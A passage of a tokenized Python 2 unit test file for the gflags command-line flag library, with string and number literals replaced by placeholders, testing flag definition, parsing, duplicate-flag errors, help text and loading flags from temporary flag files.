<EOL> FLAGS . noexec = None <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> assert FLAGS . noexec == <NUM_LIT:1> <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , None , "<STR_LIT>" ) <EOL> argv = ( '<STR_LIT>' , ) <EOL> argv = FLAGS ( argv ) <EOL> assert FLAGS . 
testnone == None <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , None , "<STR_LIT>" ) <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , None , "<STR_LIT>" ) <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , None , "<STR_LIT>" ) <EOL> gflags . DEFINE_integer ( "<STR_LIT>" , None , "<STR_LIT>" ) <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> assert FLAGS . get ( '<STR_LIT>' , '<STR_LIT:foo>' ) == <NUM_LIT:1> <EOL> assert FLAGS . get ( '<STR_LIT>' , '<STR_LIT:foo>' ) == <NUM_LIT:0> <EOL> assert FLAGS . get ( '<STR_LIT>' , '<STR_LIT:foo>' ) == '<STR_LIT:foo>' <EOL> assert FLAGS . get ( '<STR_LIT>' , '<STR_LIT:foo>' ) == '<STR_LIT:foo>' <EOL> lists = [ [ '<STR_LIT:hello>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:1>' ] , <EOL> [ ] , ] <EOL> gflags . DEFINE_list ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> gflags . DEFINE_spaceseplist ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> for name , sep in ( ( '<STR_LIT>' , '<STR_LIT:U+002C>' ) , ( '<STR_LIT>' , '<STR_LIT:U+0020>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:\n>' ) ) : <EOL> for lst in lists : <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' % ( name , sep . join ( lst ) ) ) <EOL> argv = FLAGS ( argv ) <EOL> self . assertEquals ( getattr ( FLAGS , name ) , lst ) <EOL> flagsHelp = str ( FLAGS ) <EOL> assert flagsHelp . find ( "<STR_LIT>" ) != - <NUM_LIT:1> , "<STR_LIT>" <EOL> assert flagsHelp . find ( repeatHelp ) != - <NUM_LIT:1> , "<STR_LIT>" <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> self . assertEqual ( FLAGS . get ( '<STR_LIT>' , None ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( FLAGS . get ( '<STR_LIT>' , None ) , <NUM_LIT:0> ) <EOL> gflags . DEFINE_multistring ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> short_name = '<STR_LIT:s>' ) <EOL> self . assertEqual ( FLAGS . get ( '<STR_LIT>' , None ) , [ '<STR_LIT>' , ] ) <EOL> multi_string_defs = [ '<STR_LIT>' , '<STR_LIT>' , ] <EOL> gflags . 
DEFINE_multistring ( '<STR_LIT>' , multi_string_defs , <EOL> '<STR_LIT>' , <EOL> short_name = '<STR_LIT:m>' ) <EOL> self . assertEqual ( FLAGS . get ( '<STR_LIT>' , None ) , multi_string_defs ) <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> self . assertEqual ( FLAGS . get ( '<STR_LIT>' , None ) , [ '<STR_LIT>' , '<STR_LIT>' , ] ) <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> self . assertEqual ( FLAGS . get ( '<STR_LIT:q>' , None ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( FLAGS . get ( '<STR_LIT:x>' , None ) , <NUM_LIT:8> ) <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> self . assertEqual ( FLAGS . get ( '<STR_LIT:q>' , None ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( FLAGS . get ( '<STR_LIT:x>' , None ) , <NUM_LIT:9> ) <EOL> self . assertEqual ( FLAGS . get ( '<STR_LIT>' , None ) , <NUM_LIT:0> ) <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> self . assertEqual ( FLAGS . get ( '<STR_LIT:q>' , None ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( FLAGS . get ( '<STR_LIT:x>' , None ) , <NUM_LIT:10> ) <EOL> self . assertEqual ( FLAGS . get ( '<STR_LIT>' , None ) , <NUM_LIT:1> ) <EOL> oldtestlist = FLAGS . testlist <EOL> oldtestspacelist = FLAGS . testspacelist <EOL> argv = ( '<STR_LIT>' , <EOL> FLAGS [ '<STR_LIT>' ] . Serialize ( ) , <EOL> FLAGS [ '<STR_LIT>' ] . Serialize ( ) , <EOL> FLAGS [ '<STR_LIT>' ] . Serialize ( ) , <EOL> FLAGS [ '<STR_LIT>' ] . Serialize ( ) ) <EOL> argv = FLAGS ( argv ) <EOL> self . assertEqual ( FLAGS [ '<STR_LIT>' ] . Serialize ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( FLAGS [ '<STR_LIT>' ] . Serialize ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( FLAGS [ '<STR_LIT>' ] . Serialize ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( FLAGS [ '<STR_LIT>' ] . 
Serialize ( ) , '<STR_LIT>' ) <EOL> testlist1 = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> testspacelist1 = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> FLAGS . testlist = list ( testlist1 ) <EOL> FLAGS . testspacelist = list ( testspacelist1 ) <EOL> argv = ( '<STR_LIT>' , <EOL> FLAGS [ '<STR_LIT>' ] . Serialize ( ) , <EOL> FLAGS [ '<STR_LIT>' ] . Serialize ( ) ) <EOL> argv = FLAGS ( argv ) <EOL> self . assertEqual ( FLAGS . testlist , testlist1 ) <EOL> self . assertEqual ( FLAGS . testspacelist , testspacelist1 ) <EOL> testlist1 = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> testspacelist1 = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> FLAGS . testlist = list ( testlist1 ) <EOL> FLAGS . testspacelist = list ( testspacelist1 ) <EOL> argv = ( '<STR_LIT>' , <EOL> FLAGS [ '<STR_LIT>' ] . Serialize ( ) , <EOL> FLAGS [ '<STR_LIT>' ] . Serialize ( ) ) <EOL> argv = FLAGS ( argv ) <EOL> self . assertEqual ( FLAGS . testlist , testlist1 ) <EOL> self . assertEqual ( FLAGS . testspacelist , testspacelist1 ) <EOL> FLAGS . testlist = oldtestlist <EOL> FLAGS . testspacelist = oldtestspacelist <EOL> def ArgsString ( ) : <EOL> flagnames = FLAGS . RegisteredFlags ( ) <EOL> flagnames . sort ( ) <EOL> nonbool_flags = [ '<STR_LIT>' % ( name , FLAGS . get ( name , None ) ) <EOL> for name in flagnames <EOL> if not isinstance ( FLAGS [ name ] , gflags . BooleanFlag ) ] <EOL> truebool_flags = [ '<STR_LIT>' % ( name ) <EOL> for name in flagnames <EOL> if isinstance ( FLAGS [ name ] , gflags . BooleanFlag ) and <EOL> FLAGS . get ( name , None ) ] <EOL> falsebool_flags = [ '<STR_LIT>' % ( name ) <EOL> for name in flagnames <EOL> if isinstance ( FLAGS [ name ] , gflags . BooleanFlag ) and <EOL> not FLAGS . get ( name , None ) ] <EOL> return '<STR_LIT:U+0020>' . join ( nonbool_flags + truebool_flags + falsebool_flags ) <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> FLAGS ( argv ) <EOL> self . assertEqual ( FLAGS . get ( '<STR_LIT>' , None ) , <NUM_LIT:3> ) <EOL> self . 
assertEqual ( FLAGS . get ( '<STR_LIT:name>' , None ) , '<STR_LIT>' ) <EOL> self . assertEqual ( FLAGS . get ( '<STR_LIT>' , None ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( ArgsString ( ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> FLAGS ( argv ) <EOL> self . assertEqual ( FLAGS . get ( '<STR_LIT>' , None ) , <NUM_LIT:3> ) <EOL> self . assertEqual ( FLAGS . get ( '<STR_LIT:name>' , None ) , '<STR_LIT>' ) <EOL> self . assertEqual ( FLAGS . get ( '<STR_LIT>' , None ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( ArgsString ( ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> try : <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:0> , "<STR_LIT>" , short_name = '<STR_LIT:q>' ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . DuplicateFlag , e : <EOL> pass <EOL> try : <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:0> , "<STR_LIT>" , short_name = '<STR_LIT:z>' ) <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:0> , "<STR_LIT>" , short_name = '<STR_LIT:z>' ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . DuplicateFlag , e : <EOL> self . assertTrue ( "<STR_LIT>" in e . args [ <NUM_LIT:0> ] ) <EOL> self . assertTrue ( "<STR_LIT>" in e . args [ <NUM_LIT:0> ] ) <EOL> self . assertTrue ( "<STR_LIT>" in e . args [ <NUM_LIT:0> ] ) <EOL> try : <EOL> gflags . 
DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:0> , "<STR_LIT>" , short_name = '<STR_LIT:s>' ) <EOL> gflags . DEFINE_boolean ( "<STR_LIT:s>" , <NUM_LIT:0> , "<STR_LIT>" ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . DuplicateFlag , e : <EOL> self . assertTrue ( "<STR_LIT>" in e . args [ <NUM_LIT:0> ] ) <EOL> self . assertTrue ( "<STR_LIT>" in e . args [ <NUM_LIT:0> ] ) <EOL> self . assertTrue ( "<STR_LIT>" in e . args [ <NUM_LIT:0> ] ) <EOL> flagnames = [ "<STR_LIT>" ] <EOL> original_flags = gflags . FlagValues ( ) <EOL> gflags . DEFINE_boolean ( flagnames [ <NUM_LIT:0> ] , False , "<STR_LIT>" , <EOL> flag_values = original_flags ) <EOL> duplicate_flags = module_foo . DuplicateFlags ( flagnames ) <EOL> try : <EOL> original_flags . AppendFlagValues ( duplicate_flags ) <EOL> except gflags . DuplicateFlagError , e : <EOL> self . assertTrue ( "<STR_LIT>" in str ( e ) ) <EOL> self . assertTrue ( "<STR_LIT>" in str ( e ) ) <EOL> try : <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:0> , "<STR_LIT>" , short_name = '<STR_LIT:u>' , <EOL> allow_override = <NUM_LIT:0> ) <EOL> flag = FLAGS . FlagDict ( ) [ '<STR_LIT>' ] <EOL> self . assertEqual ( flag . default , <NUM_LIT:0> ) <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:1> , "<STR_LIT>" , short_name = '<STR_LIT:u>' , <EOL> allow_override = <NUM_LIT:1> ) <EOL> flag = FLAGS . FlagDict ( ) [ '<STR_LIT>' ] <EOL> self . assertEqual ( flag . default , <NUM_LIT:1> ) <EOL> except gflags . DuplicateFlag , e : <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> try : <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:0> , "<STR_LIT>" , short_name = '<STR_LIT:u>' , <EOL> allow_override = <NUM_LIT:1> ) <EOL> flag = FLAGS . FlagDict ( ) [ '<STR_LIT>' ] <EOL> self . assertEqual ( flag . default , <NUM_LIT:0> ) <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:1> , "<STR_LIT>" , short_name = '<STR_LIT:u>' , <EOL> allow_override = <NUM_LIT:0> ) <EOL> flag = FLAGS . FlagDict ( ) [ '<STR_LIT>' ] <EOL> self . 
assertEqual ( flag . default , <NUM_LIT:1> ) <EOL> except gflags . DuplicateFlag , e : <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> try : <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:0> , "<STR_LIT>" , short_name = '<STR_LIT>' , <EOL> allow_override = <NUM_LIT:0> ) <EOL> flag = FLAGS . FlagDict ( ) [ '<STR_LIT>' ] <EOL> self . assertEqual ( flag . default , <NUM_LIT:0> ) <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , None , "<STR_LIT>" , short_name = '<STR_LIT>' , <EOL> allow_override = <NUM_LIT:1> ) <EOL> raise AssertionError ( '<STR_LIT>' ) <EOL> except gflags . DuplicateFlagCannotPropagateNoneToSwig , e : <EOL> pass <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:0> , "<STR_LIT>" , short_name = '<STR_LIT:u>' , <EOL> allow_override = <NUM_LIT:1> ) <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:1> , "<STR_LIT>" , short_name = '<STR_LIT:u>' , <EOL> allow_override = <NUM_LIT:1> ) <EOL> self . assert_ ( str ( FLAGS ) . find ( '<STR_LIT>' ) == - <NUM_LIT:1> ) <EOL> self . assert_ ( str ( FLAGS ) . find ( '<STR_LIT>' ) != - <NUM_LIT:1> ) <EOL> new_flags = gflags . FlagValues ( ) <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:0> , "<STR_LIT>" , flag_values = new_flags ) <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:0> , "<STR_LIT>" , flag_values = new_flags ) <EOL> self . assertEqual ( len ( new_flags . FlagDict ( ) ) , <NUM_LIT:2> ) <EOL> old_len = len ( FLAGS . FlagDict ( ) ) <EOL> FLAGS . AppendFlagValues ( new_flags ) <EOL> self . assertEqual ( len ( FLAGS . FlagDict ( ) ) - old_len , <NUM_LIT:2> ) <EOL> self . assertEqual ( "<STR_LIT>" in FLAGS . FlagDict ( ) , True ) <EOL> self . assertEqual ( "<STR_LIT>" in FLAGS . FlagDict ( ) , True ) <EOL> FLAGS . RemoveFlagValues ( new_flags ) <EOL> self . assertEqual ( len ( FLAGS . FlagDict ( ) ) , old_len ) <EOL> self . assertFalse ( "<STR_LIT>" in FLAGS . FlagDict ( ) ) <EOL> self . assertFalse ( "<STR_LIT>" in FLAGS . FlagDict ( ) ) <EOL> new_flags = gflags . 
FlagValues ( ) <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:0> , "<STR_LIT>" , flag_values = new_flags ) <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:0> , "<STR_LIT>" , flag_values = new_flags , <EOL> short_name = "<STR_LIT>" ) <EOL> self . assertEqual ( len ( new_flags . FlagDict ( ) ) , <NUM_LIT:3> ) <EOL> old_len = len ( FLAGS . FlagDict ( ) ) <EOL> FLAGS . AppendFlagValues ( new_flags ) <EOL> self . assertEqual ( len ( FLAGS . FlagDict ( ) ) - old_len , <NUM_LIT:3> ) <EOL> self . assertTrue ( "<STR_LIT>" in FLAGS . FlagDict ( ) ) <EOL> self . assertTrue ( "<STR_LIT>" in FLAGS . FlagDict ( ) ) <EOL> self . assertTrue ( "<STR_LIT>" in FLAGS . FlagDict ( ) ) <EOL> self . assertEqual ( FLAGS . FlagDict ( ) [ '<STR_LIT>' ] , FLAGS . FlagDict ( ) [ '<STR_LIT>' ] ) <EOL> FLAGS . RemoveFlagValues ( new_flags ) <EOL> self . assertEqual ( len ( FLAGS . FlagDict ( ) ) , old_len ) <EOL> self . assertFalse ( "<STR_LIT>" in FLAGS . FlagDict ( ) ) <EOL> self . assertFalse ( "<STR_LIT>" in FLAGS . FlagDict ( ) ) <EOL> self . assertFalse ( "<STR_LIT>" in FLAGS . FlagDict ( ) ) <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:0> , "<STR_LIT>" ) <EOL> new_flags = gflags . FlagValues ( ) <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:0> , "<STR_LIT>" , flag_values = new_flags ) <EOL> try : <EOL> FLAGS . AppendFlagValues ( new_flags ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . DuplicateFlag , e : <EOL> pass <EOL> try : <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> FLAGS ( argv ) <EOL> raise AssertionError ( '<STR_LIT>' <EOL> + str ( FLAGS . repeat ) ) <EOL> except gflags . IllegalFlagValue : <EOL> pass <EOL> try : <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> FLAGS ( argv ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . IllegalFlagValue : <EOL> pass <EOL> try : <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> FLAGS ( argv ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . 
FlagsError : <EOL> pass <EOL> try : <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> FLAGS ( argv ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . IllegalFlagValue : <EOL> pass <EOL> try : <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> FLAGS ( argv ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . IllegalFlagValue : <EOL> pass <EOL> try : <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> FLAGS ( argv ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . IllegalFlagValue : <EOL> pass <EOL> helpstr = FLAGS . ModuleHelp ( module_baz ) <EOL> expected_help = "<STR_LIT:\n>" + module_baz . __name__ + "<STR_LIT::>" + """<STR_LIT>""" <EOL> self . assertMultiLineEqual ( expected_help , helpstr ) <EOL> helpstr = FLAGS . MainModuleHelp ( ) <EOL> expected_help = "<STR_LIT:\n>" + sys . argv [ <NUM_LIT:0> ] + '<STR_LIT::>' + """<STR_LIT>""" <EOL> help_help = """<STR_LIT>""" <EOL> expected_help = expected_help . replace ( '<STR_LIT>' , <EOL> help_help + '<STR_LIT>' ) <EOL> self . assertMultiLineEqual ( expected_help , helpstr ) <EOL> class MultiNumericalFlagsTest ( googletest . TestCase ) : <EOL> def testMultiNumericalFlags ( self ) : <EOL> """<STR_LIT>""" <EOL> int_defaults = [ <NUM_LIT> , <NUM_LIT> , ] <EOL> gflags . DEFINE_multi_int ( '<STR_LIT>' , int_defaults , <EOL> '<STR_LIT>' , <EOL> short_name = '<STR_LIT>' ) <EOL> self . assertListEqual ( FLAGS . get ( '<STR_LIT>' , None ) , int_defaults ) <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> FLAGS ( argv ) <EOL> self . assertListEqual ( FLAGS . get ( '<STR_LIT>' , None ) , [ - <NUM_LIT> , <NUM_LIT> , ] ) <EOL> float_defaults = [ <NUM_LIT> , <NUM_LIT:3> ] <EOL> gflags . DEFINE_multi_float ( '<STR_LIT>' , float_defaults , <EOL> '<STR_LIT>' , <EOL> short_name = '<STR_LIT>' ) <EOL> for ( expected , actual ) in zip ( float_defaults , FLAGS . get ( '<STR_LIT>' , None ) ) : <EOL> self . 
assertAlmostEquals ( expected , actual ) <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> FLAGS ( argv ) <EOL> expected_floats = [ - <NUM_LIT> , <NUM_LIT> ] <EOL> for ( expected , actual ) in zip ( expected_floats , FLAGS . get ( '<STR_LIT>' , None ) ) : <EOL> self . assertAlmostEquals ( expected , actual ) <EOL> def testSingleValueDefault ( self ) : <EOL> """<STR_LIT>""" <EOL> int_default = <NUM_LIT> <EOL> gflags . DEFINE_multi_int ( '<STR_LIT>' , int_default , <EOL> '<STR_LIT>' ) <EOL> self . assertListEqual ( FLAGS . get ( '<STR_LIT>' , None ) , [ int_default ] ) <EOL> float_default = <NUM_LIT> <EOL> gflags . DEFINE_multi_float ( '<STR_LIT>' , float_default , <EOL> '<STR_LIT>' ) <EOL> actual = FLAGS . get ( '<STR_LIT>' , None ) <EOL> self . assertEquals ( <NUM_LIT:1> , len ( actual ) ) <EOL> self . assertAlmostEquals ( actual [ <NUM_LIT:0> ] , float_default ) <EOL> def testBadMultiNumericalFlags ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaisesWithRegexpMatch ( <EOL> gflags . IllegalFlagValue , <EOL> '<STR_LIT>' , <EOL> gflags . DEFINE_multi_int , '<STR_LIT>' , [ '<STR_LIT:abc>' ] , '<STR_LIT>' ) <EOL> self . assertRaisesWithRegexpMatch ( <EOL> gflags . IllegalFlagValue , <EOL> '<STR_LIT>' , <EOL> gflags . DEFINE_multi_float , '<STR_LIT>' , [ '<STR_LIT:abc>' ] , '<STR_LIT>' ) <EOL> gflags . DEFINE_multi_int ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertRaisesWithRegexpMatch ( <EOL> gflags . IllegalFlagValue , <EOL> '<STR_LIT>' , <EOL> FLAGS , argv ) <EOL> gflags . DEFINE_multi_float ( '<STR_LIT>' , <NUM_LIT> , <EOL> '<STR_LIT>' ) <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertRaisesWithRegexpMatch ( <EOL> gflags . IllegalFlagValue , <EOL> '<STR_LIT>' , <EOL> FLAGS , argv ) <EOL> class LoadFromFlagFileTest ( googletest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . flag_values = gflags . FlagValues ( ) <EOL> self . flag_values . 
UseGnuGetOpt ( False ) <EOL> gflags . DEFINE_string ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_string ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_boolean ( '<STR_LIT>' , <NUM_LIT:0> , '<STR_LIT>' , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_integer ( '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' , <EOL> lower_bound = <NUM_LIT:0> , flag_values = self . flag_values ) <EOL> gflags . DEFINE_list ( '<STR_LIT>' , "<STR_LIT>" , '<STR_LIT>' , <EOL> flag_values = self . flag_values ) <EOL> self . files_to_delete = [ ] <EOL> def tearDown ( self ) : <EOL> self . _RemoveTestFiles ( ) <EOL> def _SetupTestFiles ( self ) : <EOL> """<STR_LIT>""" <EOL> tmp_path = '<STR_LIT>' <EOL> if os . path . exists ( tmp_path ) : <EOL> shutil . rmtree ( tmp_path ) <EOL> os . makedirs ( tmp_path ) <EOL> try : <EOL> tmp_flag_file_1 = open ( tmp_path + '<STR_LIT>' , '<STR_LIT:w>' ) <EOL> tmp_flag_file_2 = open ( tmp_path + '<STR_LIT>' , '<STR_LIT:w>' ) <EOL> tmp_flag_file_3 = open ( tmp_path + '<STR_LIT>' , '<STR_LIT:w>' ) <EOL> tmp_flag_file_4 = open ( tmp_path + '<STR_LIT>' , '<STR_LIT:w>' ) <EOL> except IOError , e_msg : <EOL> print e_msg <EOL> print '<STR_LIT>' <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> tmp_flag_file_1 . write ( '<STR_LIT>' ) <EOL> tmp_flag_file_1 . write ( '<STR_LIT>' ) <EOL> tmp_flag_file_1 . write ( '<STR_LIT:\n>' ) <EOL> tmp_flag_file_1 . write ( '<STR_LIT>' ) <EOL> tmp_flag_file_1 . write ( '<STR_LIT>' ) <EOL> file_list = [ tmp_flag_file_1 . name ] <EOL> tmp_flag_file_2 . write ( '<STR_LIT>' ) <EOL> tmp_flag_file_2 . write ( '<STR_LIT>' % tmp_flag_file_1 . name ) <EOL> tmp_flag_file_2 . write ( '<STR_LIT>' ) <EOL> tmp_flag_file_2 . write ( '<STR_LIT>' ) <EOL> tmp_flag_file_2 . write ( '<STR_LIT>' ) <EOL> file_list . append ( tmp_flag_file_2 . name ) <EOL> tmp_flag_file_3 . write ( '<STR_LIT>' % tmp_flag_file_3 . 
name ) <EOL> tmp_flag_file_3 . write ( '<STR_LIT>' ) <EOL> tmp_flag_file_3 . write ( '<STR_LIT>' ) <EOL> tmp_flag_file_3 . write ( '<STR_LIT>' ) <EOL> file_list . append ( tmp_flag_file_3 . name ) <EOL> tmp_flag_file_4 . write ( '<STR_LIT>' % tmp_flag_file_3 . name ) <EOL> tmp_flag_file_4 . write ( '<STR_LIT>' ) <EOL> tmp_flag_file_4 . write ( '<STR_LIT>' ) <EOL> os . chmod ( tmp_path + '<STR_LIT>' , <NUM_LIT:0> ) <EOL> file_list . append ( tmp_flag_file_4 . name ) <EOL> tmp_flag_file_1 . close ( ) <EOL> tmp_flag_file_2 . close ( ) <EOL> tmp_flag_file_3 . close ( ) <EOL> tmp_flag_file_4 . close ( ) <EOL> self . files_to_delete = file_list <EOL> return file_list <EOL> def _RemoveTestFiles ( self ) : <EOL> """<STR_LIT>""" <EOL> for file_name in self . files_to_delete : <EOL> try : <EOL> os . remove ( file_name ) <EOL> except OSError , e_msg : <EOL> print '<STR_LIT>' % e_msg <EOL> def _ReadFlagsFromFiles ( self , argv , force_gnu ) : <EOL> return argv [ : <NUM_LIT:1> ] + self . flag_values . ReadFlagsFromFiles ( argv [ <NUM_LIT:1> : ] , <EOL> force_gnu = force_gnu ) <EOL> def testMethod_flagfiles_1 ( self ) : <EOL> """<STR_LIT>""" <EOL> fake_cmd_line = '<STR_LIT>' <EOL> fake_argv = fake_cmd_line . split ( '<STR_LIT:U+0020>' ) <EOL> self . flag_values ( fake_argv ) <EOL> self . assertEqual ( self . flag_values . UnitTestBoolFlag , <NUM_LIT:1> ) <EOL> self . assertEqual ( fake_argv , self . _ReadFlagsFromFiles ( fake_argv , False ) ) <EOL> def testMethod_flagfiles_2 ( self ) : <EOL> """<STR_LIT>""" <EOL> tmp_files = self . _SetupTestFiles ( ) <EOL> fake_cmd_line = '<STR_LIT>' % tmp_files [ <NUM_LIT:0> ] <EOL> fake_argv = fake_cmd_line . split ( '<STR_LIT:U+0020>' ) <EOL> expected_results = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> test_results = self . _ReadFlagsFromFiles ( fake_argv , False ) <EOL> self . 
assertEqual ( expected_results , test_results ) <EOL> def testMethod_flagfiles_3 ( self ) : <EOL> """<STR_LIT>""" <EOL> tmp_files = self . _SetupTestFiles ( ) <EOL> fake_cmd_line = ( '<STR_LIT>' <EOL> % tmp_files [ <NUM_LIT:1> ] ) <EOL> fake_argv = fake_cmd_line . split ( '<STR_LIT:U+0020>' ) <EOL> expected_results = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> test_results = self . _ReadFlagsFromFiles ( fake_argv , False ) <EOL> self . assertEqual ( expected_results , test_results ) <EOL> def testMethod_flagfiles_4 ( self ) : <EOL> """<STR_LIT>""" <EOL> tmp_files = self . _SetupTestFiles ( ) <EOL> fake_cmd_line = ( '<STR_LIT>' <EOL> % tmp_files [ <NUM_LIT:2> ] ) <EOL> fake_argv = fake_cmd_line . split ( '<STR_LIT:U+0020>' ) <EOL> expected_results = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> test_results = self . _ReadFlagsFromFiles ( fake_argv , False ) <EOL> self . assertEqual ( expected_results , test_results ) <EOL> def testMethod_flagfiles_5 ( self ) : <EOL> """<STR_LIT>""" <EOL> tmp_files = self . _SetupTestFiles ( ) <EOL> fake_cmd_line = '<STR_LIT>' % tmp_files [ <NUM_LIT:0> ] <EOL> fake_argv = 